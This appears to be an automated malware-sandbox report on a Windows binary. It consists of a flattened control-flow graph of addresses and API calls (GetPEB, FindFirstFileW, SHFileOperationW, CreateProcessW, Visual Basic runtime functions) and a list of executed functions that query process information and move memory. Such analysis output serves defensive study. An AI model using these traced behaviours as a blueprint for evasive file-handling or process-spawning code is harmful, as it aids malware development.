10403->10417 10404 3f5367 10405 3f3f00 GetPEB 10404->10405 10407 3f5386 10404->10407 10406 3f537a 10405->10406 10408 3f3e60 GetPEB 10406->10408 10409 3f53ae 10407->10409 10412 3f3f00 GetPEB 10407->10412 10408->10407 10409->10116 10410 3f534d RtlAllocateHeap 10410->10409 10410->10417 10413 3f53a2 10412->10413 10415 3f3e60 GetPEB 10413->10415 10414 3f3f00 GetPEB 10414->10417 10415->10409 10416 3f3e60 GetPEB 10416->10417 10417->10404 10417->10409 10417->10410 10417->10414 10417->10416 10418 3f42c0 10417->10418 10419 3f42cd 10418->10419 10420 3f42e3 10418->10420 10421 3f3f00 GetPEB 10419->10421 10424 3f3f00 GetPEB 10420->10424 10425 3f430b 10420->10425 10422 3f42d7 10421->10422 10423 3f3e60 GetPEB 10422->10423 10423->10420 10426 3f42ff 10424->10426 10425->10417 10427 3f3e60 GetPEB 10426->10427 10427->10425 10429 3f3050 10428->10429 10431 3f307a 10429->10431 10443 3f38f0 10429->10443 10431->10135 10432 3f3092 10432->10135 10438 3f7c80 10433->10438 10434 3f7d97 10434->10145 10435 3f7ddd 10437 3f3f00 GetPEB 10435->10437 10442 3f7dfd 10435->10442 10436 3f3f00 GetPEB 10436->10438 10440 3f7df1 10437->10440 10438->10434 10438->10435 10438->10436 10439 3f3e60 GetPEB 10438->10439 10439->10438 10441 3f3e60 GetPEB 10440->10441 10441->10442 10442->10145 10444 3f3910 10443->10444 10445 3f3a3b FindFirstFileW 10444->10445 10446 3f3ac1 10444->10446 10447 3f3b70 10444->10447 10451 3f34c0 GetPEB 10444->10451 10453 3f3f00 GetPEB 10444->10453 10454 3f38f0 GetPEB 10444->10454 10455 3f3e60 GetPEB 10444->10455 10456 3f3460 GetPEB 10444->10456 10445->10444 10452 3f3b8f 10445->10452 10446->10432 10448 3f3f00 GetPEB 10447->10448 10447->10452 10449 3f3b83 10448->10449 10450 3f3e60 GetPEB 10449->10450 10450->10452 10451->10444 10452->10432 10453->10444 10454->10444 10455->10444 10456->10444 10458 3f3795 10457->10458 10459 3f37ab 10457->10459 10460 3f3f00 GetPEB 10458->10460 10462 3f37dd 10459->10462 10464 3f3f00 GetPEB 10459->10464 10461 3f379f 10460->10461 10463 3f3e60 GetPEB 10461->10463 10467 3f3812 10462->10467 10468 3f3f00 GetPEB 10462->10468 10463->10459 10465 3f37d1 10464->10465 10466 3f3e60 GetPEB 10465->10466 10466->10462 10470 3f384a 10467->10470 10472 3f3f00 GetPEB 10467->10472 10469 3f3806 10468->10469 10471 3f3e60 GetPEB 10469->10471 10475 3f3f00 GetPEB 10470->10475 10477 3f3876 10470->10477 10471->10467 10473 3f383e 10472->10473 10474 3f3e60 GetPEB 10473->10474 10474->10470 10476 3f386a 10475->10476 10479 3f3e60 GetPEB 10476->10479 10478 3f38d1 SHFileOperationW 10477->10478 10480 3f3f00 GetPEB 10477->10480 10478->10153 10479->10477 10481 3f38c0 10480->10481 10482 3f3e60 GetPEB 10481->10482 10483 3f38cc 10482->10483 10483->10478 10487 3f1fd2 10484->10487 10485 3f3f00 GetPEB 10485->10487 10486 3f2212 10488 3f2208 10486->10488 10489 3f4220 GetPEB 10486->10489 10487->10485 10487->10486 10487->10488 10490 3f42c0 GetPEB 10487->10490 10491 3f3e60 GetPEB 10487->10491 10488->10161 10489->10488 10490->10487 10491->10487 10493 3f1e86 10492->10493 10494 3f1f77 10493->10494 10495 3f1f68 10493->10495 10497 3f3f00 GetPEB 10493->10497 10500 3f3e60 GetPEB 10493->10500 10494->10495 10496 3f3f00 GetPEB 10494->10496 10495->10161 10498 3f1f98 10496->10498 10497->10493 10499 3f3e60 GetPEB 10498->10499 10499->10495 10500->10493 10502 3f5c26 10501->10502 10503 3f5c10 10501->10503 10507 3f3f00 GetPEB 10502->10507 10511 3f5c4e 10502->10511 10504 3f3f00 GetPEB 10503->10504 10505 3f5c1a 10504->10505 10506 3f3e60 GetPEB 10505->10506 10506->10502 10508 3f5c42 10507->10508 10510 3f3e60 GetPEB 10508->10510 10509 3f5cd2 10509->10161 10510->10511 10511->10509 10512 3f5c99 10511->10512 10513 3f3f00 GetPEB 10511->10513 10516 3f5cc1 10512->10516 10517 3f3f00 GetPEB 10512->10517 10514 3f5c8d 10513->10514 10515 3f3e60 GetPEB 10514->10515 10515->10512 10516->10161 10518 3f5cb5 10517->10518 10519 3f3e60 GetPEB 10518->10519 10519->10516 10521 3f1d06 10520->10521 10522 3f1cf0 10520->10522 10526 3f3f00 GetPEB 10521->10526 10528 3f1dad 10521->10528 10523 3f3f00 GetPEB 10522->10523 10524 3f1cfa 10523->10524 10525 3f3e60 GetPEB 10524->10525 10525->10521 10527 3f1da1 10526->10527 10529 3f3e60 GetPEB 10527->10529 10530 3f1de1 10528->10530 10531 3f3f00 GetPEB 10528->10531 10529->10528 10534 3f4ea0 GetPEB 10530->10534 10532 3f1dd5 10531->10532 10533 3f3e60 GetPEB 10532->10533 10533->10530 10535 3f1e15 10534->10535 10535->10161 10540 3f2255 10536->10540 10537 3f3f00 GetPEB 10537->10540 10538 3f229c 10538->10161 10539 3f25be 10541 3f25cd 10539->10541 10543 3f4220 GetPEB 10539->10543 10540->10537 10540->10538 10540->10539 10542 3f3e60 GetPEB 10540->10542 10541->10161 10542->10540 10543->10541 10556 3f2c1a 10544->10556 10545 3f2fcf 10548 3f2fee 10545->10548 10549 3f3f00 GetPEB 10545->10549 10547 3f2cae 10547->10161 10548->10161 10551 3f2fe2 10549->10551 10550 3f34c0 GetPEB 10550->10556 10553 3f3e60 GetPEB 10551->10553 10552 3f3e60 GetPEB 10552->10556 10553->10548 10554 3f3f00 GetPEB 10554->10556 10555 3f3460 GetPEB 10555->10556 10556->10545 10556->10547 10556->10550 10556->10552 10556->10554 10556->10555 10558 3f4220 GetPEB 10556->10558 10596 3f56f0 10556->10596 10605 3f2980 10556->10605 10558->10556 10562 3f4eb6 10559->10562 10560 3f4f3d 10560->10161 10561 3f3f00 GetPEB 10561->10562 10562->10560 10562->10561 10563 3f3e60 GetPEB 10562->10563 10563->10562 10576 3f191f 10564->10576 10565 3f1bc6 10566 3f35c0 GetPEB 10565->10566 10567 3f1bd0 10566->10567 10569 3f1bf1 10567->10569 10570 3f3f00 GetPEB 10567->10570 10568 3f1ba4 10568->10161 10575 3f1c23 10569->10575 10577 3f3f00 GetPEB 10569->10577 10571 3f1be5 10570->10571 10574 3f3e60 GetPEB 10571->10574 10572 3f3f00 GetPEB 10572->10576 10573 3f3e60 GetPEB 10573->10576 10574->10569 10580 3f3f00 GetPEB 10575->10580 10583 3f1c4b 10575->10583 10576->10565 10576->10568 10576->10572 10576->10573 10581 3f4e30 GetPEB 10576->10581 10618 3f35c0 10576->10618 10578 3f1c17 10577->10578 10579 3f3e60 GetPEB 10578->10579 10579->10575 10582 3f1c3f 10580->10582 10581->10576 10584 3f3e60 GetPEB 10582->10584 10583->10161 10584->10583 10587 3f422d 10586->10587 10588 3f4243 10586->10588 10589 3f3f00 GetPEB 10587->10589 10592 3f3f00 GetPEB 10588->10592 10595 3f426b 10588->10595 10590 3f4237 10589->10590 10591 3f3e60 GetPEB 10590->10591 10591->10588 10593 3f425f 10592->10593 10594 3f3e60 GetPEB 10593->10594 10594->10595 10595->10163 10604 3f5701 10596->10604 10597 3f57e3 10598 3f5723 10597->10598 10599 3f3f00 GetPEB 10597->10599 10598->10556 10600 3f57f6 10599->10600 10603 3f3e60 GetPEB 10600->10603 10601 3f3e60 GetPEB 10601->10604 10602 3f3f00 GetPEB 10602->10604 10603->10598 10604->10597 10604->10598 10604->10601 10604->10602 10614 3f29a0 10605->10614 10606 3f2abf 10607 3f2b0c 10606->10607 10608 3f2ae4 10606->10608 10610 3f3f00 GetPEB 10606->10610 10607->10556 10608->10607 10615 3f3f00 GetPEB 10608->10615 10609 3f3e60 GetPEB 10609->10614 10611 3f2ad8 10610->10611 10613 3f3e60 GetPEB 10611->10613 10612 3f3f00 GetPEB 10612->10614 10613->10608 10614->10606 10614->10609 10614->10612 10616 3f2b00 10615->10616 10617 3f3e60 GetPEB 10616->10617 10617->10607 10619 3f35e4 10618->10619 10620 3f3f00 GetPEB 10619->10620 10621 3f3609 10619->10621 10622 3f35fd 10620->10622 10624 3f3f00 GetPEB 10621->10624 10627 3f3631 10621->10627 10623 3f3e60 GetPEB 10622->10623 10623->10621 10625 3f3625 10624->10625 10626 3f3e60 GetPEB 10625->10626 10626->10627 10627->10576 10629 3f5516 10628->10629 10630 3f552c 10628->10630 10631 3f3f00 GetPEB 10629->10631 10634 3f3f00 GetPEB 10630->10634 10637 3f5586 10630->10637 10632 3f5520 10631->10632 10633 3f3e60 GetPEB 10632->10633 10633->10630 10635 3f557a 10634->10635 10636 3f3e60 GetPEB 10635->10636 10636->10637 10637->10195 10642 3fab66 10638->10642 10640 3fab8c 10640->10212 10642->10640 10643 3fac52 10642->10643 10645 3f3e60 GetPEB 10642->10645 10648 3f3f00 GetPEB 10642->10648 10711 3f4b70 10642->10711 10733 3facd0 10642->10733 10644 3f3f00 GetPEB 10643->10644 10651 3fac71 10643->10651 10646 3fac65 10644->10646 10645->10642 10647 3f3e60 GetPEB 10646->10647 10647->10651 10648->10642 10649 3fac99 10649->10212 10650 3f3f00 GetPEB 10652 3fac8d 10650->10652 10651->10649 10651->10650 10653 3f3e60 GetPEB 10652->10653 10653->10649 10670 3fa189 10654->10670 10655 3facd0 GetPEB 10655->10670 10656 3fa552 10658 3fa571 10656->10658 10661 3f3f00 GetPEB 10656->10661 10657 3fa439 10657->10212 10668 3fa599 10658->10668 10669 3f3f00 GetPEB 10658->10669 10660 3f34c0 GetPEB 10660->10670 10663 3fa565 10661->10663 10662 3f4220 GetPEB 10662->10670 10666 3f3e60 GetPEB 10663->10666 10664 3f4b70 2 API calls 10664->10670 10665 3f3f00 GetPEB 10665->10670 10666->10658 10668->10212 10671 3fa58d 10669->10671 10670->10655 10670->10656 10670->10657 10670->10660 10670->10662 10670->10664 10670->10665 10672 3f3460 GetPEB 10670->10672 10674 3f3e60 GetPEB 10670->10674 10743 3fb520 10670->10743 10750 3f1150 10670->10750 10673 3f3e60 GetPEB 10671->10673 10672->10670 10673->10668 10674->10670 10693 3fa7c5 10675->10693 10676 3faa19 10676->10212 10677 3facd0 GetPEB 10677->10693 10678 3faa7c GetCurrentProcessId 10678->10693 10679 3faacd 10680 3faaec 10679->10680 10684 3f3f00 GetPEB 10679->10684 10688 3fab14 10680->10688 10689 3f3f00 GetPEB 10680->10689 10681 3f4b70 2 API calls 10681->10693 10685 3faae0 10684->10685 10687 3f3e60 GetPEB 10685->10687 10686 3f42c0 GetPEB 10686->10693 10687->10680 10688->10212 10691 3fab08 10689->10691 10690 3f3f00 GetPEB 10690->10693 10692 3f3e60 GetPEB 10691->10692 10692->10688 10693->10676 10693->10677 10693->10678 10693->10679 10693->10681 10693->10686 10693->10690 10694 3f3e60 GetPEB 10693->10694 10765 3f49a0 10693->10765 10775 3f4850 10693->10775 10694->10693 10696 3fa5ef 10695->10696 10697 3fa710 10696->10697 10698 3f3f00 GetPEB 10696->10698 10699 3fa731 10696->10699 10702 3f3e60 GetPEB 10696->10702 10703 3f42c0 GetPEB 10696->10703 10784 3f4370 10696->10784 10697->10212 10698->10696 10701 3fa750 10699->10701 10704 3f3f00 GetPEB 10699->10704 10706 3fa778 10701->10706 10708 3f3f00 GetPEB 10701->10708 10702->10696 10703->10696 10705 3fa744 10704->10705 10707 3f3e60 GetPEB 10705->10707 10706->10212 10707->10701 10709 3fa76c 10708->10709 10710 3f3e60 GetPEB 10709->10710 10710->10706 10712 3f4b98 10711->10712 10713 3f4b82 10711->10713 10716 3f4bd7 CreateProcessW 10712->10716 10718 3f3f00 GetPEB 10712->10718 10714 3f3f00 GetPEB 10713->10714 10715 3f4b8c 10714->10715 10717 3f3e60 GetPEB 10715->10717 10719 3f4bf7 10716->10719 10720 3f4c73 10716->10720 10717->10712 10721 3f4bc6 10718->10721 10722 3f4bff 10719->10722 10724 3f4c33 10719->10724 10726 3f3f00 GetPEB 10719->10726 10720->10642 10723 3f3e60 GetPEB 10721->10723 10722->10642 10725 3f4bd2 10723->10725 10729 3f3f00 GetPEB 10724->10729 10731 3f4c5d 10724->10731 10725->10716 10727 3f4c27 10726->10727 10728 3f3e60 GetPEB 10727->10728 10728->10724 10730 3f4c51 10729->10730 10732 3f3e60 GetPEB 10730->10732 10731->10642 10732->10731 10742 3faced 10733->10742 10734 3faf9f 10736 3faf37 10734->10736 10737 3f3f00 GetPEB 10734->10737 10735 3f34c0 GetPEB 10735->10742 10736->10642 10738 3fafb2 10737->10738 10740 3f3e60 GetPEB 10738->10740 10739 3f3e60 GetPEB 10739->10742 10740->10736 10741 3f3f00 GetPEB 10741->10742 10742->10734 10742->10735 10742->10736 10742->10739 10742->10741 10748 3fb536 10743->10748 10744 3fb55f 10744->10670 10745 3f3f00 GetPEB 10745->10748 10746 3fb633 10759 3f4fd0 10746->10759 10748->10744 10748->10745 10748->10746 10749 3f3e60 GetPEB 10748->10749 10749->10748 10758 3f1160 10750->10758 10751 3f124c 10752 3f1244 10751->10752 10754 3f3f00 GetPEB 10751->10754 10752->10670 10753 3f3f00 GetPEB 10753->10758 10755 3f125f 10754->10755 10756 3f3e60 GetPEB 10755->10756 10756->10752 10757 3f3e60 GetPEB 10757->10758 10758->10751 10758->10752 10758->10753 10758->10757 10760 3f4ff9 10759->10760 10763 3f500f 10759->10763 10761 3f3f00 GetPEB 10760->10761 10762 3f5003 10761->10762 10764 3f3e60 GetPEB 10762->10764 10763->10744 10764->10763 10769 3f49c0 10765->10769 10766 3f49ea 10766->10693 10767 3f4b37 10767->10766 10768 3f3f00 GetPEB 10767->10768 10771 3f4b4a 10768->10771 10769->10766 10769->10767 10770 3f34c0 GetPEB 10769->10770 10773 3f3f00 GetPEB 10769->10773 10774 3f3e60 GetPEB 10769->10774 10770->10769 10772 3f3e60 GetPEB 10771->10772 10772->10766 10773->10769 10774->10769 10782 3f4870 10775->10782 10776 3f3f00 GetPEB 10776->10782 10777 3f496e 10778 3f492c 10777->10778 10779 3f3f00 GetPEB 10777->10779 10778->10693 10781 3f4981 10779->10781 10780 3f3e60 GetPEB 10780->10782 10783 3f3e60 GetPEB 10781->10783 10782->10776 10782->10777 10782->10778 10782->10780 10783->10778 10785 3f450e 10784->10785 10786 3f4384 10784->10786 10785->10696 10786->10785 10787 3f3f00 GetPEB 10786->10787 10791 3f43d6 10786->10791 10788 3f43ca 10787->10788 10789 3f3e60 GetPEB 10788->10789 10789->10791 10790 3f4436 10795 3f44ba 10790->10795 10797 3f3f00 GetPEB 10790->10797 10799 3f3e60 GetPEB 10790->10799 10791->10790 10792 3f3f00 GetPEB 10791->10792 10800 3f44f4 10791->10800 10793 3f442a 10792->10793 10794 3f3e60 GetPEB 10793->10794 10794->10790 10804 3f4550 10795->10804 10797->10790 10799->10790 10800->10696 10801 3f3f00 GetPEB 10802 3f44e8 10801->10802 10803 3f3e60 GetPEB 10802->10803 10803->10800 10805 3f44d0 10804->10805 10808 3f456b 10804->10808 10805->10800 10805->10801 10806 3f3e60 GetPEB 10806->10808 10807 3f3f00 GetPEB 10807->10808 10808->10805 10808->10806 10808->10807 10816 3f55c6 10809->10816 10810 3f3f00 GetPEB 10810->10816 10811 3f56a8 10812 3f55e8 10811->10812 10813 3f3f00 GetPEB 10811->10813 10812->10235 10814 3f56bb 10813->10814 10815 3f3e60 GetPEB 10814->10815 10815->10812 10816->10810 10816->10811 10816->10812 10817 3f3e60 GetPEB 10816->10817 10817->10816 10824 3f4ca0 10818->10824 10819 3f4db4 10821 3f4d7c 10819->10821 10822 3f3f00 GetPEB 10819->10822 10820 3f3f00 GetPEB 10820->10824 10821->10235 10823 3f4dc7 10822->10823 10825 3f3e60 GetPEB 10823->10825 10824->10819 10824->10820 10824->10821 10826 3f3e60 GetPEB 10824->10826 10825->10821 10826->10824 10828 3f46d7 10827->10828 10831 3f46ed 10827->10831 10829 3f3f00 GetPEB 10828->10829 10830 3f46e1 10829->10830 10832 3f3e60 GetPEB 10830->10832 10833 3f4760 10831->10833 10834 3f4721 10831->10834 10835 3f3f00 GetPEB 10831->10835 10832->10831 10833->10241 10838 3f4752 10834->10838 10839 3f3f00 GetPEB 10834->10839 10836 3f4715 10835->10836 10837 3f3e60 GetPEB 10836->10837 10837->10834 10838->10241 10840 3f4746 10839->10840 10841 3f3e60 GetPEB 10840->10841 10841->10838 10855 3f25f0 10842->10855 10843 3f2912 10845 3f2937 10843->10845 10847 3f3f00 GetPEB 10843->10847 10844 3f3f00 GetPEB 10844->10855 10852 3f295f 10845->10852 10853 3f3f00 GetPEB 10845->10853 10846 3f42c0 GetPEB 10846->10855 10849 3f292b 10847->10849 10848 3f2771 10848->10276 10850 3f3e60 GetPEB 10849->10850 10850->10845 10851 3f3e60 GetPEB 10851->10855 10852->10276 10854 3f2953 10853->10854 10856 3f3e60 GetPEB 10854->10856 10855->10843 10855->10844 10855->10846 10855->10848 10855->10851 10856->10852 10859 3f1010 10857->10859 10858 3f103a 10858->10303 10859->10858 10860 3f3f00 GetPEB 10859->10860 10861 3f1105 10859->10861 10864 3f3e60 GetPEB 10859->10864 10860->10859 10861->10858 10862 3f3f00 GetPEB 10861->10862 10863 3f1118 10862->10863 10865 3f3e60 GetPEB 10863->10865 10864->10859 10865->10858 10867 3f34c0 GetPEB 10866->10867 10868 3f36c4 10867->10868 10869 3f36e5 10868->10869 10870 3f3f00 GetPEB 10868->10870 10873 3f3f00 GetPEB 10869->10873 10874 3f371a 10869->10874 10871 3f36d9 10870->10871 10872 3f3e60 GetPEB 10871->10872 10872->10869 10875 3f370e 10873->10875 10877 3f3742 10874->10877 10878 3f3f00 GetPEB 10874->10878 10876 3f3e60 GetPEB 10875->10876 10876->10874 10881 3f376e 10877->10881 10882 3f3f00 GetPEB 10877->10882 10879 3f3736 10878->10879 10880 3f3e60 GetPEB 10879->10880 10880->10877 10881->10041 10883 3f3762 10882->10883 10884 3f3e60 GetPEB 10883->10884 10884->10881 10894 3f7712 10885->10894 10886 3f34c0 GetPEB 10886->10894 10887 3f77b3 10888 3f77d2 10887->10888 10890 3f3f00 GetPEB 10887->10890 10888->10377 10889 3f78a3 10889->10377 10892 3f77c6 10890->10892 10891 3f3f00 GetPEB 10891->10894 10893 3f3e60 GetPEB 10892->10893 10893->10888 10894->10886 10894->10887 10894->10889 10894->10891 10895 3f3e60 GetPEB 10894->10895 10895->10894 9652 4197a0 9653 4197e3 __vbaObjSet 9652->9653 9655 419869 9653->9655 9656 419884 __vbaI4Var 9655->9656 9657 41986f __vbaHresultCheckObj 9655->9657 9658 4198a3 9656->9658 9657->9656 9659 4198a9 __vbaHresultCheckObj 9658->9659 9660 4198b8 __vbaFreeObj __vbaFreeVar 9658->9660 9659->9660 9661 4198d3 __vbaObjSet 9660->9661 9662 419915 9661->9662 9663 41991b __vbaHresultCheckObj 9662->9663 9664 41992a __vbaI4Var 9662->9664 9663->9664 9665 419953 9664->9665 9666 419959 __vbaHresultCheckObj 9665->9666 9667 419968 __vbaFreeObj __vbaFreeVar 9665->9667 9666->9667 9668 419983 __vbaObjSet 9667->9668 9669 4199c5 9668->9669 9670 4199cb __vbaHresultCheckObj 9669->9670 9671 4199da __vbaI4Var 9669->9671 9670->9671 9672 419a03 9671->9672 9673 419a09 __vbaHresultCheckObj 9672->9673 9674 419a18 __vbaFreeObj __vbaFreeVar 9672->9674 9673->9674 9675 419a57 9674->9675 9676 419a5d __vbaHresultCheckObj 9675->9676 9677 419a6c __vbaBoolVar 9675->9677 9676->9677 9678 419a86 9677->9678 9679 419aa5 9678->9679 9680 419a8c __vbaHresultCheckObj 9678->9680 9681 419aab __vbaFreeVar 9679->9681 9680->9681 9860 4243a0 9681->9860 9684 419aeb 9686 419b15 __vbaObjSet 9684->9686 9687 419b04 __vbaHresultCheckObj 9684->9687 9685 419add __vbaHresultCheckObj 9685->9684 9689 419b6e 9686->9689 9687->9686 9690 419b83 __vbaCastObjVar __vbaObjSet 9689->9690 9691 419b74 __vbaHresultCheckObj 9689->9691 9692 419bb5 9690->9692 9691->9690 9693 419bbb __vbaHresultCheckObj 9692->9693 9694 419bcd __vbaFreeObjList __vbaFreeVarList 9692->9694 9693->9694 9695 419bfd __vbaObjSet 9694->9695 9696 419c3f 9695->9696 9697 419c45 __vbaHresultCheckObj 9696->9697 9698 419c54 __vbaStrVarVal 9696->9698 9697->9698 9699 419c7a 9698->9699 9700 419c80 __vbaHresultCheckObj 9699->9700 9701 419c92 __vbaFreeStr __vbaFreeObj __vbaFreeVar 9699->9701 9700->9701 9702 419cf3 9701->9702 9703 419cf9 __vbaHresultCheckObj 9702->9703 9704 419d0e __vbaI2Var __vbaFreeVar 9702->9704 9703->9704 9705 419d5a 9704->9705 9706 419d60 __vbaHresultCheckObj 9705->9706 9707 419d75 __vbaI2Var __vbaFreeVar 9705->9707 9706->9707 9708 419dc3 9707->9708 9709 419dc9 __vbaHresultCheckObj 9708->9709 9710 419dde __vbaI2Var __vbaFreeVar 9708->9710 9709->9710 9711 419e2c 9710->9711 9712 419e32 __vbaHresultCheckObj 9711->9712 9713 419e47 __vbaI2Var __vbaFreeVar 9711->9713 9712->9713 9714 419e95 9713->9714 9715 419eb0 __vbaI2Var __vbaFreeVar 9714->9715 9716 419e9b __vbaHresultCheckObj 9714->9716 9717 419efe 9715->9717 9716->9715 9718 419f04 __vbaHresultCheckObj 9717->9718 9719 419f19 __vbaBoolVar __vbaFreeVar 9717->9719 9718->9719 9720 419f67 9719->9720 9721 419f82 __vbaBoolVar __vbaFreeVar 9720->9721 9722 419f6d __vbaHresultCheckObj 9720->9722 9723 419fd0 9721->9723 9722->9721 9724 419fd6 __vbaHresultCheckObj 9723->9724 9725 419feb __vbaI2Var __vbaFreeVar __vbaI4Str __vbaI4Str 9723->9725 9724->9725 9870 410a44 9725->9870 9727 41a027 __vbaSetSystemError 9728 41a076 9727->9728 9729 41a091 __vbaBoolVar __vbaFreeVar 9728->9729 9730 41a07c __vbaHresultCheckObj 9728->9730 9731 41a0df 9729->9731 9730->9729 9732 41a0e5 __vbaHresultCheckObj 9731->9732 9733 41a0fa __vbaI2Var __vbaFreeVar 9731->9733 9732->9733 9734 4240c0 __vbaVarVargNofree __vbaI4Var 9733->9734 9735 41a128 9734->9735 9736 41a142 __vbaSetSystemError __vbaFreeVar 9735->9736 9737 41a18b 9736->9737 9738 41a191 __vbaHresultCheckObj 9737->9738 9739 41a1a6 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9737->9739 9738->9739 9740 41a212 9739->9740 9741 41a218 __vbaHresultCheckObj 9740->9741 9742 41a22d __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9740->9742 9741->9742 9743 41a299 9742->9743 9744 41a2b4 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9743->9744 9745 41a29f __vbaHresultCheckObj 9743->9745 9746 41a2ff 9744->9746 9747 41a2ef __vbaNew2 9744->9747 9745->9744 9748 41a373 9746->9748 9749 41a35e __vbaHresultCheckObj 9746->9749 9747->9746 9750 41a38c 9748->9750 9751 41a37c __vbaNew2 9748->9751 9749->9748 9752 41a405 __vbaHresultCheckObj 9750->9752 9753 41a41a __vbaVar2Vec __vbaRefVarAry __vbaUbound 9750->9753 9751->9750 9752->9753 9754 422660 13 API calls 9753->9754 9755 41a449 __vbaErase __vbaAryMove __vbaFreeVarList 9754->9755 9756 41a4cb 9755->9756 9757 41a4d1 __vbaHresultCheckObj 9756->9757 9758 41a4e6 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9756->9758 9757->9758 9759 41a550 9758->9759 9760 41a556 __vbaHresultCheckObj 9759->9760 9761 41a56b __vbaBoolVar __vbaFreeVar 9759->9761 9760->9761 9762 41d540 26 API calls 9761->9762 9763 41a58c 9762->9763 9764 41bc40 94 API calls 9763->9764 9765 41a596 9764->9765 9766 41bc40 94 API calls 9765->9766 9767 41a5a0 9766->9767 9768 41bc40 94 API calls 9767->9768 9769 41a5aa 9768->9769 9770 4229f0 75 API calls 9769->9770 9771 41a5b5 9770->9771 9772 41a5f2 __vbaHresultCheckObj 9771->9772 9773 41a607 __vbaBoolVar __vbaFreeVar 9771->9773 9772->9773 9774 41a655 9773->9774 9775 41a670 __vbaBoolVar __vbaFreeVar 9774->9775 9776 41a65b __vbaHresultCheckObj 9774->9776 9777 4240c0 __vbaVarVargNofree __vbaI4Var 9775->9777 9776->9775 9778 41a6a9 9777->9778 9779 41a90e __vbaErrorOverflow 9778->9779 9780 4240c0 __vbaVarVargNofree __vbaI4Var 9778->9780 9782 41a960 9779->9782 9781 41a6c2 9780->9781 9781->9779 9783 41a6ca 9781->9783 9784 41abd6 __vbaObjSet 9782->9784 9785 41a97b __vbaObjSet 9782->9785 9788 41a6d5 __vbaFreeVarList 9783->9788 9790 41abfc 9784->9790 9789 41a9a1 9785->9789 9791 41a719 9788->9791 9792 41a9c0 9789->9792 9793 41a9a7 __vbaHresultCheckObj 9789->9793 9794 41ac02 __vbaHresultCheckObj 9790->9794 9795 41ac1b 9790->9795 9796 41a71f __vbaHresultCheckObj 9791->9796 9797 41a72e __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 9791->9797 9804 41a9e7 __vbaFreeObj 9792->9804 9805 41a9d9 __vbaHresultCheckObj 9792->9805 9793->9792 9794->9795 9802 41ac42 __vbaFreeObj 9795->9802 9803 41ac34 __vbaHresultCheckObj 9795->9803 9796->9797 9798 41a767 __vbaObjSet 9797->9798 9799 41a7a9 9797->9799 9809 41a788 9798->9809 9858 415d80 105 API calls 9799->9858 9859 40f5dc 9799->9859 9801 41a7b2 __vbaAryLock 9806 41a7c9 9801->9806 9807 41a7e8 __vbaGenerateBoundsError 9801->9807 9811 41ac54 __vbaObjSet 9802->9811 9803->9802 9814 41a9f9 __vbaObjSet 9804->9814 9805->9804 9806->9807 9810 41a7cf 9806->9810 9808 41a7e4 9807->9808 9816 41a7fc __vbaAryUnlock 9808->9816 9812 41a7a0 __vbaFreeObj 9809->9812 9813 41a78e __vbaHresultCheckObj 9809->9813 9810->9808 9815 41a7db __vbaGenerateBoundsError 9810->9815 9819 41ac71 9811->9819 9812->9799 9813->9812 9820 41aa13 9814->9820 9815->9808 9817 41a81f 9816->9817 9818 41a80f __vbaNew2 9816->9818 9821 41a83e __vbaObjSetAddref 9817->9821 9822 41a82e __vbaNew2 9817->9822 9818->9817 9823 41ac77 __vbaHresultCheckObj 9819->9823 9824 41ac88 9819->9824 9825 41aa27 __vbaObjSet 9820->9825 9826 41aa19 __vbaHresultCheckObj 9820->9826 9828 41a856 9821->9828 9822->9821 9823->9824 9831 41aca9 __vbaFreeObj 9824->9831 9832 41ac9b __vbaHresultCheckObj 9824->9832 9833 41aa4d 9825->9833 9826->9825 9829 41a86b __vbaFreeObj 9828->9829 9830 41a85c __vbaHresultCheckObj 9828->9830 9834 41a8d6 __vbaAryDestruct __vbaFreeVar 9829->9834 9830->9829 9838 41acb2 9831->9838 9832->9831 9835 41aa53 __vbaHresultCheckObj 9833->9835 9836 41aa64 9833->9836 9835->9836 9837 41ad0b 9836->9837 9839 41aa95 __vbaFreeObjList 9836->9839 9840 41aa87 __vbaHresultCheckObj 9836->9840 9837->9837 9841 41aab1 __vbaObjSet 9839->9841 9840->9839 9842 41aace 9841->9842 9843 41aae5 9842->9843 9844 41aad4 __vbaHresultCheckObj 9842->9844 9845 41ab06 __vbaFreeObj 9843->9845 9846 41aaf8 __vbaHresultCheckObj 9843->9846 9844->9843 9847 41ab18 __vbaObjSet 9845->9847 9846->9845 9848 41ab32 9847->9848 9849 41ab46 __vbaObjSet 9848->9849 9850 41ab38 __vbaHresultCheckObj 9848->9850 9852 41ab68 __vbaObjSet 9849->9852 9850->9849 9853 41ab7b 9852->9853 9854 41ab81 __vbaHresultCheckObj 9853->9854 9855 41ab8c 9853->9855 9854->9855 9855->9837 9856 41abba __vbaFreeObjList 9855->9856 9857 41abaf __vbaHresultCheckObj 9855->9857 9856->9838 9857->9856 9858->9801 9859->9801 9861 4243db __vbaI2I4 9860->9861 9872 4240c0 __vbaVarVargNofree __vbaI4Var 9861->9872 9864 424414 9873 4240c0 __vbaVarVargNofree __vbaI4Var 9864->9873 9866 42441f 9867 424426 __vbaFreeVarList 9866->9867 9868 42446e __vbaErrorOverflow 9866->9868 9869 419aca 9867->9869 9869->9684 9869->9685 9871 410a4d 9870->9871 9872->9864 9873->9866

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 003E0448
                                                          • Part of subcall function 003E1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003E0EFD,00000000), ref: 003E1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 003E0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003E0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 003E048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003E0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 003E049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003E04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003E04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003E04E0
